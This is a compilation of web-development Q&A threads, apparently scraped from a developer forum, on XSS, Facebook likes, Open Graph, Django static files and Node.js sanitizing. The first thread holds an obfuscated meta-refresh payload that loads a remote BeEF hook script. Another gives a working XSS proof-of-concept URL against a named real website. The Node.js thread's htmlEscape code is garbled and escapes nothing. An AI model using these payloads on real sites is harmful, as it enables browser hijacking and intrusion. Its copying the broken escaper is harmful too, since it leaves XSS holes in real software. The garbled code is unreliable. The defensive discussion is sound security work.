XSS in meta tag - xss

Some professional pentester guy told me this xss test vector is useless for pentest.And the payload seems like this:
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
but when i'm save the code to a HTML file with more powerful javascript like hook.js (from beef exploit framework).
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly on firefox and chrome.i can see the victim online with my beef exploit framework and a lot of function is available.
I dont really get it.what's wrong with this payload.I have asked this question several times but there is no response from him . it makes me very confuse.Is there any body can tell me why he said this one is useless for pentest.

XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious javascript on the hosting domain, but will only work in Safari; all other browsers refuse to follow a location: javascript: header.
When using a data URI in the tag, the browser will load the decoded payload into a null domain and any javascript will be fired in the context of a null domain. While this can still be used to fire redirects, XHR, and other such attacks it is useless for accessing anything on the hosting domain. This attack will also not work in IE since it only allows data URIs for image type elements, and I think that is even restricted to style/css.
Though meta tag injections are only successful for XSS in very limited capacity, they are still very dangerous in other attacks and are worth testing.

As far as I remember data:-URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However this could be used to deliver an exploit or for phishing, so I wouldnt call it totally useless.

Related

XSS DOM vulnerable

I tested site for vulnerables (folder /service-contact) and possible XSS DOM issue came up (using Kali Linux, Vega and XSSER). However, i tried to manually test url with 'alert' script to make sure it's vulnerable. I used
www.babyland.nl/service-contact/alert("test")
No alert box/pop-up was shown, only the html code showed up in contact form box.
I am not sure i used the right code (i'm a rookie) or did the right interpretation. Server is Apache, using javascript/js.
Can you help?
Thanks!
This is Not Vulnerable to XSS, Whatever you are writing in the URL is Coming in Below Form section ( Vraag/opmerking ) . And the Double Quotes (") are Escaped. If you try another Payload like <script>alert(/xss/)</script> That Also won't work, Because this is Not Reflecting neither Storing. You will see output as a Text in Vraag/opmerking. Don't Rely on Online Scanners, Test Manually, For DOM Based XSS ..Check Sink and Sources and Analyze them.
The tool is right. There is a XSS-Vulnerability on the site, but the proof of concept (PoC) code is wrong. The content of a <textarea> can only contain character data (see <textarea> description on MDN). So your <script>alert("test")</script> is interpreted as text and not as HTML code. But you can close the <textarea> tag and insert the javascript code after that.
Here is the working PoC URL:
https://www.babyland.nl/service-contact/</textarea><script>alert("test")</script>
which is rendered as:
<textarea rows="" cols="" id="comment" name="comment"></textarea<script>alert("test")</script></textarea>
A little note to testing for XSS injection: Chrome/Chromium has a XSS protection. So this code doesn't exploit in this browser. For manual testing you can use Firefox or run Chrome with: --disable-web-security (see this StackOverflow Question and this for more information).

Why Facebook Likes number changed for the same URL?

I have migrated my website from Joomla to RubyOnRails, but, I've noticed that number of likes has changed at the same URL!
It was about 780 in the old website, then it became 35 in the new one
What possible reasons it could be?
The most likely reason would be that the URLs are not exactly the same. Most likely due to a query string at the end of the URL.
If you are positive that isn't it, check to see that the source for calling the facebook like button is the same.
This is a long shot, but if it still isn't fixed, you might want to compare the meta data inside the head tag and look for differences there.
<link rel="canonical" href="http://my.website.com" />
would be one that comes to mind.

How can i implement a open graph (http://ogp.me/) to use my custom tags in another website?

I've reviewed http://ogp.me/ but couldn't find a solution. What I want to do is:
defining a xmlns like:
<html xmlns:fb="http://ogp.me/ns/fb#">
set up an id for that website like:
<meta property="fb:app_id" content="1234" />
and use that tags as a component in html like:
<myTag:video src="somurl">/</myTag>
Could you give me any idea how can I implement such an methodology for my system?
Ok, i found another solution to make a dynamic components that serves from my application to external websites like a comment plugin. Just use js to get informaition and push your html inside that website. xmlns definition is not a good idea, also facebook cancel its fbml structure to pure javascript & css via api communication. Thats the valid way.

What are the pros and cons in serving CSS and JavaScript using Django template system

Often, I encounter scenarios where I see it makes sense to use template tags in CSS and JavaScript files, such as the use of {{ STATIC_URL }} in CSS to access image. I understand the only way to achieve this is to have CSS and JavaScript files served by Django. I am interested in this approach. But before I commit, I want to hear you experts' experience on it. What are the pros and cons of this approach? Thx.
Pros:
You can make a lot of per-request decisions about how things look and behave.
You can keep the number of different CSS/JS files to a minimum.
Cons:
Browsers tend to cache CSS and JS aggressively, so you'll need to use some aggressive anti-cache techniques. Of course, this means disabling caching for some/all static files.
Every CSS and JS request will consume another thread of your WSGI server. In a normal request/response cycle, each request generally takes up one thread; you're effectively tripling this, at least, so now your app that could handle 200 simultaneous requests now can only handle 66.
When your site makes it big, a CDN probably can't help you.
Alternatives:
Tweak the CSS via javascript, and set a javascript variable inside your page template to control the tweaks.
Use multiple CSS files and control their inclusion dynamically.
Generate static files as needed, but then cache them to disk and serve them via mod_xsendfile. This only works if you are serving static files from somewhere the django process can write to, such as on the same machine or a network mount.
Personally, I've been sticking with the Django team's advice to make CSS and JavaScript static files, served directly by the server instead of via Django. It hasn't been a problem and has simplified a lot of things. Generally, any time I think I need a dynamioc CSS or JS file, there's a way to refactor so I don't.
For example:
the use of {{ STATIC_URL }} in CSS to access image
I'm not sure how variable your {{ STATIC_URL }} is, but I've found that using the <base> tag in my pages fixes a lot of things. I assume this is for background images? Could you update your question to give an example?
Another thing I've done is, if my JavaScript needs dynamic data, I'll put most of the code in a JavaScript library I serve as a static file and then put the minimum dynamic stuff in a <script> tag at the end of the page. Usually I'll put it all in an object (looking a lot like JSON) and then just pass that object to a function. Come to think of it, you could just take all the dynamic stuff, make a dictionary out of it in your view function, encode it into JSON, and pass it via context. Then your page template just looks something like:
<html><head>
...
<script src="{{ STATIC_URL }}/js/foo.js"></script>
...
</head><body>
...
<script>
foo_main({{ foo_params_json|safe }});
</script>
</body></html>
This makes it a lot easier to reuse this code.

Preventing XSS in Node.js / server side javascript

Any idea how one would go about preventing XSS attacks on a node.js app? Any libs out there that handle removing javascript in hrefs, onclick attributes,etc. from POSTed data?
I don't want to have to write a regex for all that :)
Any suggestions?
I've created a module that bundles the Caja HTML Sanitizer
npm install sanitizer
http://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.npmjs.com/package/sanitizer
Any feedback appreciated.
One of the answers to Sanitize/Rewrite HTML on the Client Side suggests borrowing the whitelist-based HTML sanitizer in JS from Google Caja which, as far as I can tell from a quick scroll-through, implements an HTML SAX parser without relying on the browser's DOM.
Update: Also, keep in mind that the Caja sanitizer has apparently been given a full, professional security review while regexes are known for being very easy to typo in security-compromising ways.
Update 2017-09-24: There is also now DOMPurify. I haven't used it yet, but it looks like it meets or exceeds every point I look for:
Relies on functionality provided by the runtime environment wherever possible. (Important both for performance and to maximize security by relying on well-tested, mature implementations as much as possible.)
Relies on either a browser's DOM or jsdom for Node.JS.
Default configuration designed to strip as little as possible while still guaranteeing removal of javascript.
Supports HTML, MathML, and SVG
Falls back to Microsoft's proprietary, un-configurable toStaticHTML under IE8 and IE9.
Highly configurable, making it suitable for enforcing limitations on an input which can contain arbitrary HTML, such as a WYSIWYG or Markdown comment field. (In fact, it's the top of the pile here)
Supports the usual tag/attribute whitelisting/blacklisting and URL regex whitelisting
Has special options to sanitize further for certain common types of HTML template metacharacters.
They're serious about compatibility and reliability
Automated tests running on 16 different browsers as well as three diffferent major versions of Node.JS.
To ensure developers and CI hosts are all on the same page, lock files are published.
All usual techniques apply to node.js output as well, which means:
Blacklists will not work.
You're not supposed to filter input in order to protect HTML output. It will not work or will work by needlessly malforming the data.
You're supposed to HTML-escape text in HTML output.
I'm not sure if node.js comes with some built-in for this, but something like that should do the job:
function htmlEscape(text) {
return text.replace(/&/g, '&').
replace(/</g, '<'). // it's not neccessary to escape >
replace(/"/g, '"').
replace(/'/g, ''');
}
I recently discovered node-validator by chriso.
Example
get('/', function (req, res) {
//Sanitize user input
req.sanitize('textarea').xss(); // No longer supported
req.sanitize('foo').toBoolean();
});
XSS Function Deprecation
The XSS function is no longer available in this library.
https://github.com/chriso/validator.js#deprecations
You can also look at ESAPI. There is a javascript version of the library. It's pretty sturdy.
In newer versions of validator module you can use the following script to prevent XSS attack:
var validator = require('validator');
var escaped_string = validator.escape(someString);
Try out the npm module strip-js. It performs the following actions:
Sanitizes HTML
Removes script tags
Removes attributes such as "onclick", "onerror", etc. which contain JavaScript code
Removes "href" attributes which contain JavaScript code
https://www.npmjs.com/package/strip-js
Update 2021-04-16: xss is a module used to filter input from users to prevent XSS attacks.
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist.
Visit https://www.npmjs.com/package/xss
Project Homepage: http://jsxss.com
You should try library npm "insane".
https://github.com/bevacqua/insane
I try in production, it works well. Size is very small (around ~3kb gzipped).
Sanitize html
Remove all attributes or tags who evaluate js
You can allow attributes or tags that you don't want sanitize
The documentation is very easy to read and understand.
https://github.com/bevacqua/insane